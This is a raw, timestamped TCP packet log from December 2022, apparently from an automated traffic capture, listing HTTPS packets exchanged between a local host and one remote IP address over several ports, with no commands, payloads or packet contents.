Dec 20, 2022 14:14:39.946276903 CET	49711	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:39.953077078 CET	49711	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:39.953094006 CET	443	49711	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:39.955743074 CET	49711	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:39.955758095 CET	443	49711	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:40.578847885 CET	443	49711	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:40.578942060 CET	443	49711	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:40.578979969 CET	49711	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:40.579016924 CET	49711	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:40.580043077 CET	49711	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:40.580075979 CET	443	49711	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:40.580102921 CET	49711	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:40.580142975 CET	49711	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:42.819505930 CET	49712	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:42.819601059 CET	443	49712	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:42.819705009 CET	49712	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:42.820022106 CET	49712	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:42.820048094 CET	443	49712	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:43.437107086 CET	443	49712	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:43.437305927 CET	49712	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:43.438870907 CET	49712	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:43.438889980 CET	443	49712	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:43.441562891 CET	49712	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:43.441584110 CET	443	49712	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:44.046178102 CET	443	49712	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:44.046264887 CET	443	49712	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:44.046462059 CET	49712	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:44.047147036 CET	49712	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:44.047182083 CET	443	49712	118.27.125.229	192.168.2.5
Dec 20, 2022 14:14:44.047207117 CET	49712	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:14:44.047588110 CET	49712	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:35.431066990 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:35.431133032 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:35.431210995 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:35.461991072 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:35.462064028 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:36.078404903 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:36.078675985 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:36.095289946 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:36.095340967 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:36.096000910 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:36.096137047 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:36.098975897 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:36.098999977 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:36.676448107 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:36.676578045 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:36.973680973 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:36.973704100 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:36.973776102 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:36.973907948 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:36.973936081 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:36.973979950 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:36.974016905 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:36.975522041 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:36.975564003 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:36.975658894 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:36.975687027 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:36.975722075 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:36.975761890 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.271029949 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.271092892 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.271203041 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.271245956 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.271265030 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.271277905 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.271306992 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.271325111 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.271373987 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.271378994 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.271399021 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.271413088 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.271452904 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.271478891 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.272316933 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.272389889 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.272428989 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.272445917 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.272464991 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.272506952 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.569916010 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.569981098 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.570171118 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.570207119 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.570291996 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.570719004 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.570782900 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.570827007 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.570843935 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.570919991 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.571230888 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.571275949 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.571331978 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.571346998 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.571397066 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.571439981 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.571711063 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.571753979 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.571800947 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.571814060 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.571877956 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.572252035 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.572295904 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.572349072 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.572364092 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.572401047 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.572443962 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.576220989 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.576270103 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.576400042 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.576430082 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.576494932 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.869551897 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.869568110 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.869626999 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.869678020 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.869715929 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.869736910 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.869765043 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.870130062 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.870152950 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.870239973 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.870260000 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.870321989 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.870984077 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.871005058 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.871093035 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.871110916 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.871154070 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.871189117 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.871428967 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.871450901 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.871527910 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.871542931 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.871576071 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.871601105 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.872159004 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.872180939 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.872253895 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.872271061 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.872315884 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.872347116 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.872564077 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.872586012 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.873101950 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.873163939 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.873163939 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.873187065 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.873209000 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.873270988 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.873837948 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.873858929 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.873934984 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.873953104 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.873982906 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.874012947 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.874501944 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.874522924 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.874603033 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.874618053 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.874677896 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.875530005 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.875552893 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.875642061 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.875663042 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.875726938 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.875884056 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.875919104 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.875972033 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.875983953 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.876033068 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.876111984 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.876276970 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.876296997 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.876379013 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.876394033 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:37.876437902 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:37.876451969 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.166349888 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.166384935 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.166443110 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.166460991 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.166490078 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.166508913 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.167196989 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.167227983 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.167299032 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.167304993 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.167349100 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.167397976 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.167897940 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.167932987 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.167989969 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.167995930 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.168037891 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.168066025 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.168443918 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.168467999 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.168524981 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.168531895 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.168581009 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.168747902 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.168767929 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.168823004 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.168828964 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.168859959 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.168880939 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.169229984 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.169264078 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.169318914 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.169323921 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.169363976 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.169387102 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.169636011 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.169661045 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.169764042 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.169770002 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.169825077 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.170336008 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.170372963 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.170543909 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.170551062 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.170803070 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.171020985 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.171046972 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.171143055 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.171149969 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.171175003 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.171210051 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.171540022 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.171582937 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.171649933 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.171659946 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.171672106 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.171708107 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.172014952 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.172040939 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.172215939 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.172224045 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.172296047 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.172568083 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.172595978 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.172646999 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.172652960 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.172672033 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.172691107 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.173154116 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.173183918 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.173221111 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.173227072 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.173264980 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.173284054 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.173530102 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.173554897 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.173609018 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.173614025 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.173676968 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.174038887 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.174060106 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.174109936 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.174118042 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.174138069 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.174161911 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.174426079 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.174452066 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.174496889 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.174503088 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.174539089 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.174559116 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.175041914 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.175065994 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.175132036 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.175137997 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.175188065 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.175649881 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.175677061 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.175733089 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.175740004 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.175765991 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.175786972 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.176012993 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.176032066 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.176085949 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.176093102 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.176136017 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.176429033 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.176451921 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.176510096 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.176515102 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.176558971 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.176579952 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.177114964 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.177146912 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.177195072 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.177201986 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.177237988 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.177259922 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.177820921 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.177851915 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.177891016 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.177896023 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.177927017 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.177954912 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.178518057 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.178550959 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.178594112 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.178601027 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.178636074 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.178653955 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.179086924 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.179111958 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.179147005 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.179152966 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.179183960 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.179203033 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.208914995 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.208941936 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.209037066 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.209048986 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.209081888 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.209099054 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.463828087 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.463854074 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.463936090 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.463958979 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.463977098 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.464009047 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.467161894 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.467184067 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.467242956 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.467258930 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.467344046 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.467518091 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.467874050 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.467897892 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.467955112 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.467962980 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.468008041 CET	49718	443	192.168.2.5	118.27.125.229
Dec 20, 2022 14:15:38.468518972 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.468542099 CET	443	49718	118.27.125.229	192.168.2.5
Dec 20, 2022 14:15:38.468606949 CET	49718	443	192.168.2.5	118.27.125.229
